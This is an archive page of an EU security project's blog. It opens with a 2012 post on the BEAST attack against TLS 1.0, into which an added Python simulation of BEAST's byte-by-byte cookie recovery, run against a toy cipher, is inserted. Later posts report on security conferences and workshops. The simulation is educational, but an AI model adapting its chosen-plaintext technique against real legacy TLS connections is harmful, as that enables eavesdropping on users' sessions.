forward « The FORWARD project blog

Archive for the ‘forward’ Category

a «BEAST» exploiting the (almost) secure web, SSL.

Tuesday, January 10th, 2012

Researchers have discovered a serious weakness in virtually all websites protected by the secure sockets layer protocol that allows attackers to silently decrypt data that’s passing between a webserver and an end-user browser.

The vulnerability resides in versions 1.0 and earlier of TLS, or transport layer security, the successor to the secure sockets layer technology that serves as the internet’s foundation of trust. Although versions 1.1 and 1.2 of TLS aren’t susceptible, they remain almost entirely unsupported in browsers and websites alike, making encrypted transactions on PayPal, Gmail, and just about every other website vulnerable to eavesdropping by attackers who are able to control the connection between the end user and the website they’re visiting.

At the Ekoparty security conference in Buenos Aires (September 2011), researchers Thai Duong and Juliano Rizzo demonstrated proof-of-concept code called BEAST, short for Browser Exploit Against SSL/TLS. The stealthy piece of JavaScript works together with a network sniffer to decrypt the encrypted cookies a targeted website uses to grant access to restricted user accounts. The exploit works even against sites that use HSTS, or HTTP Strict Transport Security, which makes the browser refuse to load a site over anything but SSL/TLS: HSTS only forces the use of the protocol, it does nothing about a weakness inside it.

The demo decrypted an authentication cookie used to access a PayPal account, Duong said.

Duong and Rizzo say they’ve figured out a way to defeat SSL by breaking the underlying encryption it uses to prevent sensitive data from being read by people eavesdropping on a connection protected by the HTTPS prefix.

“BEAST is different than most published attacks against HTTPS,” Duong wrote in an email. “While other attacks focus on the authenticity property of SSL, BEAST attacks the confidentiality of the protocol. As far as we know, BEAST implements the first attack that actually decrypts HTTPS requests.”

BEAST carries out what’s known as a plaintext-recovery attack that exploits a weakness in TLS 1.0’s CBC mode that had long been regarded as mainly theoretical. In CBC mode the protocol encrypts each block of data after XORing it with the previous ciphertext block, and in TLS 1.0 the last ciphertext block of one record is reused as the IV of the next record, so an attacker watching the wire knows in advance what the next plaintext block will be XORed with. It had long been theorized that an attacker who can also inject chosen plaintext into the connection can use this to test guesses about the contents of earlier plaintext blocks.

The attacker crafts a plaintext block so that, after the XOR with the known IV, the block cipher receives exactly the input that an earlier block would have had if the guess were correct. If the guess is correct, the block cipher receives the same input for the new block as for the old block and produces an identical ciphertext block, which the sniffer sees on the wire; by arranging the request so that only one byte of the cookie is unknown in the targeted block, the attacker needs at most 256 guesses per byte.
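The mechanism described above, as an added example that is not part of the original post or of Duong and Rizzo’s code: a Python simulation of the TLS 1.0 chained-IV weakness and of the byte-by-byte recovery it enables. It assumes a toy SHA-256-based Feistel cipher standing in for AES (the attack depends only on CBC chaining, not on the cipher), a victim whose browser sends an attacker-chosen prefix followed by a secret cookie, and an attacker who both sniffs the ciphertext and can send fully chosen records on the same connection, which is the role the injected JavaScript plays in BEAST. The class and function names, the sample cookie and the zero filler used in place of TLS padding are all constructed for this example.

```python
import hashlib
import os

BLOCK = 16  # 16-byte blocks, as with AES in TLS


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 16-byte Feistel cipher (4 SHA-256 rounds), a stand-in for AES.
    Any keyed permutation works: the attack only uses the CBC structure."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(4):
        f = hashlib.sha256(key + bytes([rnd]) + right).digest()[:8]
        left, right = right, xor(left, f)
    return left + right


class Tls10CbcSession:
    """Mimics the TLS 1.0 CBC record layer (RFC 2246, 6.2.3.2): the IV of each
    new record is the last ciphertext block of the previous record, so anyone
    sniffing the wire knows the IV before the next record is sent.
    TLS 1.1+ sends a fresh random IV with every record, which removes this."""

    def __init__(self, key: bytes):
        self.key = key
        # The very first IV is derived from key material, unknown to the sniffer.
        self.chain = os.urandom(BLOCK)

    def encrypt_record(self, plaintext: bytes) -> bytes:
        assert len(plaintext) % BLOCK == 0  # TLS padding omitted for clarity
        out = b""
        for i in range(0, len(plaintext), BLOCK):
            self.chain = toy_block_encrypt(self.key, xor(plaintext[i:i + BLOCK], self.chain))
            out += self.chain
        return out


def victim_request(session: Tls10CbcSession, prefix: bytes, secret: bytes) -> bytes:
    """The victim's browser sends prefix || secret: the injected script chooses
    the prefix (e.g. the request path), the browser appends the cookie.
    Zero filler completes the last block in place of TLS padding (constructed)."""
    body = prefix + secret
    body += b"\x00" * (-len(body) % BLOCK)
    return session.encrypt_record(body)


def beast_recover(session: Tls10CbcSession, oracle, secret_len: int) -> bytes:
    """Recover the secret one byte at a time. oracle(prefix) returns the record
    the victim sent for prefix || secret; the attacker also sends records of
    fully chosen plaintext on the same connection."""
    known = b""
    # One attacker record first, so the sniffer knows the current chaining value.
    last = session.encrypt_record(b"\x00" * BLOCK)[-BLOCK:]
    for k in range(secret_len):
        # Pick the prefix length so secret[k] is the LAST byte of a block whose
        # other 15 bytes (prefix + already recovered bytes) are known.
        prefix = b"A" * ((BLOCK - 1 - k) % BLOCK)
        ct = oracle(prefix)
        blocks = [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
        i = (len(prefix) + k) // BLOCK             # block holding secret[k]
        c_prev = blocks[i - 1] if i > 0 else last  # what that block was chained with
        target = blocks[i]
        last = blocks[-1]                          # IV of whatever is sent next
        head = (prefix + known)[i * BLOCK:]        # the 15 known bytes of the target block
        for g in range(256):
            guess = head + bytes([g])
            # Chosen plaintext p: the cipher sees p ^ last == c_prev ^ guess, which is
            # exactly the input the target block had if the guess is right.
            p = xor(xor(c_prev, last), guess)
            out = session.encrypt_record(p)
            last = out[-BLOCK:]
            if out[:BLOCK] == target:
                known += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; chaining state out of sync")
    return known


if __name__ == "__main__":
    SECRET = b"PHPSESSID=deadbeef"  # constructed sample cookie
    sess = Tls10CbcSession(os.urandom(16))
    print(beast_recover(sess, lambda pfx: victim_request(sess, pfx, SECRET), len(SECRET)))
```

Each byte costs at most 256 chosen records, which is why the article’s figure of a couple of seconds per byte is plausible once the browser can be made to emit records fast enough. What the simulation leaves out is the hard part of the real exploit: coaxing a browser into sending the chosen block at a record boundary, real TLS padding and MAC, and the same-origin restrictions the JavaScript has to work around. Against TLS 1.1 or 1.2 the step that sets `last` from the previous record fails, because the next IV is random and unknown until the record is sent.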

At the moment, BEAST requires about two seconds to decrypt each byte of an encrypted cookie. That means authentication cookies 1,000 to 2,000 characters long will still take a minimum of half an hour for their PayPal attack to work. Nonetheless, the technique poses a threat to millions of websites that use earlier versions of TLS, particularly in light of Duong and Rizzo’s claim that this time can be drastically shortened.

In an email sent shortly after this article was published, Rizzo said refinements made over the past few days have reduced the time required to under 10 minutes.

“BEAST is like a cryptographic Trojan horse – an attacker slips a bit of JavaScript into your browser, and the JavaScript collaborates with a network sniffer to undermine your HTTPS connection,” Trevor Perrin, an independent security researcher, wrote in an email. “If the attack works as quickly and widely as they claim it’s a legitimate threat.”


Mozilla extends plug-in detection page to all major browsers

Tuesday, May 18th, 2010

The Mozilla Firefox development team recently came up with the idea of warning Firefox users about outdated, insecure or buggy plug-ins. It was first implemented for the Adobe Flash plug-in, as a What’s New page integrated into recent Firefox updates.

The scripts on the page check for installed plug-ins and compare the version of each installed plug-in with the latest version officially offered by that plug-in’s developer. Supported plug-ins include, among others, Apple QuickTime, Shockwave Flash, Adobe Acrobat, Java, RealPlayer and Windows Media Player. Furthermore, the Mozilla Firefox development team is now extending the page to support all the popular browsers.


FORWARD at the ICT Days 2009 in Sofia

Thursday, November 5th, 2009

From the 28th to the 31st of October 2009, the Days of Information and Communication Technologies 2009 were held at the Inter Expo Center in Sofia, Bulgaria. The event combined the specialised exhibition ICT Expo with an interesting seminar programme.
ICT Expo offers a platform for comparing current industry trends and product presentations. Its aim is to acquaint visitors with the latest innovations in all fields of information and communication technologies: server solutions, PC components, personal and mobile computers, peripherals and network solutions, card technology, business process management, learning and knowledge solutions, telecommunication equipment, financial solutions, multimedia products, business management software and information security, including innovations from Bulgarian software developers.
The seminar programme included a forum where business representatives had the opportunity to meet the new state administration and to discuss the state of the sector under the crisis conditions.

As part of the seminar programme the FP7 EU project FORWARD was presented along with another EU funded project PSIRP. In a half-hour presentation Edita Djambazova from IPP-BAS described FORWARD’s goal, objectives, and results. Some of the emerging security threats identified during the project were discussed. The established security community around ICT-FORWARD was outlined as one of its important achievements.

2nd FORWARD Workshop sum-up

Friday, June 12th, 2009

On May 4th and 5th of 2009, the FORWARD consortium organized the 2nd workshop of the project. The workshop took place in Hotel Delcloy on the Côte d’Azur. The agenda focused on the progress of the FORWARD working groups (WGs), with both summary presentations of their work and focused panel discussions for each WG. The keynotes and presentations helped to spark discussions during the panel sessions, and these carried on during the scheduled breaks.


The ICT Fair for Trust & Security Research: Aftermath

Tuesday, June 2nd, 2009

The ICT Fair for Trust and Security Research was organized by the Olomouc Region under the Czech Presidency of the EU and in collaboration with the EC. Its goal was to give practical information on the FP7 research opportunities and to foster participation in the forthcoming call for proposals. The vice-president of the Olomouc Region, Mr. Michael Fisher, opened the Fair and presented the region’s experience in collaborating with the EC on ICT. The vice-rector of Palacky University in Olomouc, Mr. Michal Malacka, talked about the University’s participation in European projects on information security.

The Head of Unit “Trust & Security” in DG INFSO of the European Commission, Mr. Jacques Bus, presented the ICT priorities in the Seventh Framework Programme. He outlined that the main goals of the objective “Trustworthy ICT” are the building of Trustworthy Network Infrastructures and Trustworthy Service Infrastructures, which are the way to develop the Future Internet as a conglomerate of heterogeneous networks and systems. Secure and trustworthy network infrastructures have to make the Future Internet more secure, allow security threats to be monitored and managed, and support secure infrastructures and virtual objects. It is important to carry out experiments and to pay attention to the societal impact and to the interaction between the technologies and the users. Mr. Bus announced that the indicative opening date of the next Call for proposals would be 31st July 2009, with a submission deadline of 3rd November 2009.


ICT Fair for Trust & Security Research

Thursday, April 30th, 2009

The ICT Fair for Trust & Security Research will be held in Olomouc, the Czech Republic, on 14 May 2009. The ICT Fair is an event promoted by the Olomouc Region, the Czech Republic, in cooperation with the European Commission, and is part of the official programme of the Czech Presidency of the EU Council. The Fair is a unique opportunity to get practical, hands-on information and concrete advice on how to become involved in the EU’s FP7 research activities.


FORWARD future threats panel at EC2ND 2008

Tuesday, January 20th, 2009

The European Conference on Computer Network Defense (EC2ND) is an annual conference bringing together academia and industry to discuss topics in network and systems security. The 2008 edition was held at Dublin City University in Dublin, Ireland. The programme included a panel organised by FORWARD, where possible future threats to the global ICT infrastructure were discussed. The panel consisted of members from all FORWARD working groups (WGs) and was chaired by Sotiris Ioannidis.


The Future of Network Resiliency in Europe

Saturday, December 20th, 2008

Communication networks are used every day by millions of European citizens to conduct business, communicate with friends and family, get the latest news, and so on. For this reason, network resiliency is of paramount importance to the European Union. The term resiliency is overloaded, but in this context we use it to mean networks that provide and maintain an acceptable level of service in the face of faults (natural disasters, human error, or intentional malicious actions) affecting their normal operation.

The European Network and Information Security Agency (ENISA) held a workshop on “Improving Resilience in European e-Communication Networks” on the 12th and 13th of November 2008 in Brussels. Sotiris Ioannidis participated in the workshop and gave a talk on the resilience-improving features of MPLS, IPv6 and DNSSEC.

FORWARD at the 2nd EU-Korea Cooperation Forum on ICT Research

Sunday, December 7th, 2008

The relations between the European Union (EU) and the Republic of South Korea are founded on increasingly shared political values, strong economic links reflecting larger and larger bilateral trade and investment flows, and the EU’s reiterated support for South Korea’s policy of engagement with the North.

In 1995, the EU decided to negotiate a “Framework Agreement on Trade and Cooperation“, in recognition of South Korea’s increasing role in the Asian and global economy, and of its success in consolidating democracy. This Agreement entered into force in April 2001 and is implemented through an annual meeting of a Joint Committee.


Threats at the ENISA-FORTH Summer School on Network and Information Security

Monday, October 6th, 2008

The first ENISA-FORTH Summer School on Network and Information Security was held in Crete, Greece between the 15th and the 19th of September. This year’s topic was “Network Security,” and brought together experts in Information Security, policy members from EU Member States and EU Institutions, decision makers from the industry as well as members of the research and academic community. The lectures covered the whole spectrum of Network Security, including financial, political, legal, and technological issues. The detail of the talks varied from highly technical to high-level, to cater to different kinds of participants. In total there were about one hundred participants, including members of the press, mostly from Europe, but also from the United States, the Middle East, and Asia.